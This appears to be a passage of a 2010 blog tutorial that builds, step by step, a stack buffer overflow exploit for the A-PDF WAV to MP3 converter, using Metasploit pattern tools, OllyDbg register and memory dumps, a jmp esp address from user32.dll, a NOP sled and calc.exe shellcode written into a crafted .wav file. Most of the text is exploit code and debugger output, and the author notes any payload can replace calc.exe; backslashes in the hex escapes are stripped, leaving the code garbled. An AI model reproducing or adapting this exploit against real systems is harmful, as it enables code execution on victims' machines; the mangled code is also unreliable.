# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A [ . . .]");
sploit = (buff);

try:
    f1 = open("Dr_IDEs3.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

Again we check the EIP address:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 35684634
ESP 035DFE90 ASCII "h7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0
Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6F
m7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1F
p2Fp3Fp4F
EBP 31684630
ESI 68463368
EDI 46326846
EIP 46366846

Eip point to 46366846. So to calculate the offset we can use another tool of Metasploit. It takes as input the value just found and the number of bytes which created the BOF.

root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 46366846 5000
4128

Now we know exactly where to overwrite the EIP. We have a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]

We know that once the EIP is overwritten and the flow of execution is captured, there is another register that could be useful to point directly to the shellcode: ESP, or the top of the stack.

Let’s see exactly what happens:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
eip = ("x42" * 4);
shellcode = ("x43" * 200);
sploit = (buff + eip + shellcode);

try:
    f1 = open("Dr_IDEs4.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

In this script we created a BOF with the character ” x41″, overwrote the EIP with ” x42″ and injected other code ” x43″. Analyzing the registers we note that the EIP has been properly overwritten and the ESP contains the character C or “ x43”. Bingo!

EAX 00000000
ECX 000010EC
EDX 000010EC
EBX 41414141
ESP 035CFE90 ASCII 43,"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 41414141
ESI 41414141
EDI 41414141
EIP 42424242

Checking the address to which ESP points, we can see that it was opportunely overwritten with “x43”.

035CFE90   43434343
035CFE94   43434343
035CFE98   43434343
035CFE9C   43434343
035CFEA0   43434343
035CFEA4   43434343
035CFEA8   43434343
035CFEAC   43434343
035CFEB0   43434343
035CFEB4   43434343
035CFEB8   43434343
035CFEBC   43434343
035CFEC0   43434343
035CFEC4   43434343
035CFEC8   43434343
035CFECC   43434343

Now we replace the characters “x43” with a working shellcode and overwrite the EIP with a jmp esp opcode. Thus when the program flow reaches the EIP, it will jump straight to our shellcode. In order to find a jmp esp opcode is necessary to look for the dll of OS and the program that loads at startup.

Hitting on “E” OllyDbg, you can see all DLLs loaded:

Executable modules
Base       Size       Entry      Name       File version      Path
00400000   001EC000   00401000   wavtomp3   1.0.0.0           C:Program FilesA-PDF Wav to MP3wavtomp3.exe
10000000   0008C000   10029CF0   lame_enc                     C:Program FilesA-PDF Wav to MP3lame_enc.dll
6B7F0000   0030B000   6B83E295   mf         12.0.7600.16385   C:WindowsSystem32mf.dll
6D270000   00072000   6D271576   dsound     6.1.7600.16385 (  C:Windowssystem32dsound.dll
6D800000   00059000   6D80DB19   MFPlat     12.0.7600.16385   C:WindowsSystem32MFPlat.DLL
6D860000   00198000   6D861291   NetworkE   6.1.7600.16385 (  C:Windowssystem32NetworkExplorer.dll
6DA00000   0005C000   6DA34A08   Structur   7.00.7600.16385   C:WindowsSystem32StructuredQuery.dll
6DFB0000   00016000   6DFB173D   thumbcac   6.1.7600.16385 (  C:Windowssystem32thumbcache.dll
707E0000   0009F000   707E18C6   SearchFo   6.1.7600.16385 (  C:Windowssystem32SearchFolder.dll
70990000   00014000   70991340   msacm32    6.1.7600.16385 (  C:Windowssystem32msacm32.dll
70B00000   00004000   70B01030   ksuser     6.1.7600.16385 (  C:WindowsSystem32ksuser.dll
70B40000   00032000   70B437C1   winmm      6.1.7600.16385 (  C:Windowssystem32winmm.dll
70F30000   0002B000   70F4D3FE   ieproxy    8.00.7600.16625   C:Program FilesInternet Explorerieproxy.dll
70FA0000   00058000   70FA15C0   tiptsf     6.1.7600.16385 (  C:Program FilesCommon Filesmicrosoft sharedinktiptsf.dll
713C0000   0002E000   713C1BBA   SHDOCVW    6.1.7600.16385 (  C:Windowssystem32SHDOCVW.dll
71480000   0004E000   714B7FAE   actxprxy   6.1.7600.16385 (  C:Windowssystem32actxprxy.dll
715B0000   0006F000   715B1E41   ntshrui    6.1.7600.16385 (  C:Windowssystem32ntshrui.dll
71620000   0000B000   71621200   CSCAPI     6.1.7600.16385 (  C:Windowssystem32CSCAPI.dll
71630000   00009000   716311D0   CSCDLL     6.1.7600.16385 (  C:WindowsSystem32CSCDLL.dll
71640000   0006A000   71641B06   cscui      6.1.7600.16385 (  C:WindowsSystem32cscui.dll
716B0000   00031000   716BA8B6   EhStorSh   6.1.7600.16385 (  C:Windowssystem32EhStorShell.dll
71880000   0016F000   7188D5F6   explorer   6.1.7600.16385 (  C:Windowssystem32explorerframe.dll
72340000   00A7E000   72347761   ieframe    8.00.7600.16385   C:Windowssystem32ieframe.DLL
73410000   0000A000   73414D20   slc        6.1.7600.16385 (  C:Windowssystem32slc.dll
73440000   00014000   73441DA9   ATL        3.05.2284         C:WindowsSystem32ATL.DLL
736C0000   00021000   736C145E   ntmarta    6.1.7600.16385 (  C:Windowssystem32ntmarta.dll
73710000   00007000   737110C0   AVRT       6.1.7600.16385 (  C:WindowsSystem32AVRT.dll
737A0000   00025000   737A2B71   POWRPROF   6.1.7600.16385 (  C:Windowssystem32POWRPROF.dll
737D0000   0003C000   737D3089   OLEACC     7.0.0.0 (win7_rt  C:Windowssystem32OLEACC.dll
73900000   0000F000   7390125E   samcli     6.1.7600.16385 (  C:Windowssystem32samcli.dll
73920000   00009000   739215A6   netutils   6.1.7600.16385 (  C:Windowssystem32netutils.dll
73970000   00007000   73971120   wsock32    6.1.7600.16385 (  C:Windowssystem32wsock32.dll
73A60000   000FB000   73A71AAE   WindowsC   6.1.7600.16385 (  C:Windowssystem32WindowsCodecs.dll
73B90000   00013000   73B91D3F   dwmapi     6.1.7600.16385 (  C:Windowssystem32dwmapi.dll
73BB0000   00039000   73BBE1E6   MMDevApi   6.1.7600.16385 (  C:WindowsSystem32MMDevApi.dll
73C40000   0002F000   73C4C7A2   DUser      6.1.7600.16385 (  C:Windowssystem32DUser.dll
73C70000   000B2000   73CC16FD   DUI70      6.1.7600.16385 (  C:Windowssystem32DUI70.dll
73EC0000   00040000   73ECA2DD   uxtheme    6.1.7600.16385 (  C:Windowssystem32uxtheme.dll
73F00000   000F5000   73F0ADAE   propsys    7.00.7600.16385   C:Windowssystem32propsys.dll
74000000   00012000   74004795   SAMLIB     6.1.7600.16385 (  C:Windowssystem32SAMLIB.dll
74040000   0019E000   74073731   comctl32   6.10 (win7_rtm.0  C:WindowsWinSxSx86_microsoft.windows.common-
controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfccomctl32.dll
745B0000   00009000   745B1220   version    6.1.7600.16385 (  C:Windowssystem32version.dll
748D0000   0003B000   748D128D   rsaenh     6.1.7600.16385 (  C:Windowssystem32rsaenh.dll
74B30000   00016000   74B32DC3   CRYPTSP    6.1.7600.16385 (  C:Windowssystem32CRYPTSP.dll
74F00000   00019000   74F01319   srvcli     6.1.7600.16385 (  C:Windowssystem32srvcli.dll
74F70000   00008000   74F710E9   Secur32    6.1.7600.16385 (  C:WindowsSystem32Secur32.dll
74F90000   0001A000   74F92CCD   SSPICLI    6.1.7600.16385 (  C:WindowsSystem32SSPICLI.DLL
74FB0000   0004B000   74FB2B6C   apphelp    6.1.7600.16385 (  C:Windowssystem32apphelp.dll
75000000   0000C000   750010E1   CRYPTBAS   6.1.7600.16385 (  C:Windowssystem32CRYPTBASE.dll
750A0000   0000E000   750A1235   RpcRtRem   6.1.7600.16385 (  C:Windowssystem32RpcRtRemote.dll
750B0000   0000B000   750B1992   profapi    6.1.7600.16385 (  C:Windowssystem32profapi.dll
75160000   00012000   75161441   DEVOBJ     6.1.7600.16385 (  C:Windowssystem32DEVOBJ.dll
752A0000   00027000   752A58B9   CFGMGR32   6.1.7600.16385 (  C:Windowssystem32CFGMGR32.dll
75360000   0004A000   75367A9D   KERNELBA   6.1.7600.16385 (  C:Windowssystem32KERNELBASE.dll
753B0000   0000A000   753B136C   LPK        6.1.7600.16385 (  C:Windowssystem32LPK.dll
753C0000   000D4000   754110E5   kernel32   6.1.7600.16385 (  C:Windowssystem32kernel32.dll
754A0000   00045000   754A11E1   WLDAP32    6.1.7600.16385 (  C:Windowssystem32WLDAP32.dll
754F0000   000CC000   754F168B   MSCTF      6.1.7600.16385 (  C:Windowssystem32MSCTF.dll
755C0000   0007B000   755C1AEE   comdlg32   6.1.7600.16385 (  C:Windowssystem32comdlg32.dll
75640000   0009D000   756747D7   USP10      1.0626.7600.1638  C:Windowssystem32USP10.dll
756E0000   0008F000   756E3FB1   oleaut32   6.1.7600.16385    C:Windowssystem32oleaut32.dll
75770000   00019000   75774975   sechost    6.1.7600.16385 (  C:WindowsSYSTEM32sechost.dll
757F0000   00035000   757F145D   WS2_32     6.1.7600.16385 (  C:Windowssystem32WS2_32.dll
75830000   00083000   758323D2   CLBCatQ    2001.12.8530.163  C:Windowssystem32CLBCatQ.DLL
759C0000   000AC000   759CA472   msvcrt     7.0.7600.16385 (  C:Windowssystem32msvcrt.dll
75AA0000   0019D000   75AA17E7   SETUPAPI   6.1.7600.16385 (  C:Windowssystem32SETUPAPI.dll
75C40000   001F9000   75C4224D   iertutil   8.00.7600.16385   C:Windowssystem32iertutil.dll
75E40000   00C49000   75EBD49A   shell32    6.1.7600.16385 (  C:Windowssystem32shell32.dll
76A90000   000A1000   76ACAFD4   RPCRT4     6.1.7600.16385 (  C:Windowssystem32RPCRT4.dll
76B40000   00057000   76B5A24A   SHLWAPI    6.1.7600.16385 (  C:Windowssystem32SHLWAPI.dll
76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:Windowssystem32user32.dll
76C70000   0004E000   76C7EC49   GDI32      6.1.7600.16385 (  C:Windowssystem32GDI32.dll
76E00000   0015C000   76E55D13   ole32      6.1.7600.16385 (  C:Windowssystem32ole32.dll
76F60000   0013C000              ntdll      6.1.7600.16385 (  C:WindowsSYSTEM32ntdll.dll
770B0000   0001F000   770B1355   IMM32      6.1.7600.16385 (  C:Windowssystem32IMM32.DLL
770D0000   00005000   770D1438   PSAPI      6.1.7600.16385 (  C:Windowssystem32PSAPI.DLL
770E0000   00006000   770E1782   NSI        6.1.7600.16385 (  C:Windowssystem32NSI.dll
770F0000   000A0000   77112DD9   advapi32   6.1.7600.16385 (  C:Windowssystem32advapi32.dll

So we look for the opcode jmp esp in the dll:

76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:Windowssystem32user32.dll

Double click on dll and then right click we go to “Search for -> All commands -> jmp esp”:

Found commands
Address    Disassembly                               Comment
76BA1000   CMP DWORD PTR DS:[EDI+243276F8],ECX       (Initial CPU selection)
76BC6D53   JMP ESP

So 76BC6D53 is the address with the instruction jmp esp inside user32.dll “x53x6dxbcx76” in little endian. However, to make the exploit more reliable as possible is good practice to use dll or exe which are loaded from the program, such as “wavtomp3.exe”.
Now we can add shellcode to launch calc.exe:

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
# 76bc6d53
eip = ("x53x6dxbcx76");
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + shellcode);

try:
    f1 = open("Dr_IDEs5.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

Perfect! We have finished. This is what you’re thinking … but actually the exploit still not work. Analysing with OllyDbg we note that only the 17th character of the shellcode is present in the EIP:

034CFE90  97 FE 4C 03 1B 00 DA 03   —þL.Ú
034CFE98  00 00 00 00 00 00 FF FF   ......ÿÿ
034CFEA0  83 EB FC 31 43 0D 03 43   ƒëü1C.C
034CFEA8  5A 58 0D B7 8C 15 EE 48   ZX.·ŒîH
034CFEB0  4C 46 66 AD 7D 54 1C A5   LFf­}T¥
034CFEB8  2F 68 56 EB C3 03 3A 18   /hVëÃ:

So nops ” x90″ are necessary now in order to switch the code of 16 bytes and to run the shellcode from the beginning:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
# 76bc6d53
eip = ("x53x6dxbcx76");
nops = ("x90" * 16);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +  shellcode);

try:
    f1 = open("Dr_IDEs6.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

pwned !

Obviously instead of calc.exe we can put what we want as shown in the video:

The first tutorial finishes here.

See you.
Michele `m7x` Manzotti

References: Corelan.

Anche io voglio le scimmie di youtube! September 3, 2010

Posted by michelemanzotti in Reti e Telecomunicazioni.
Tags: ,
add a comment

ROFL!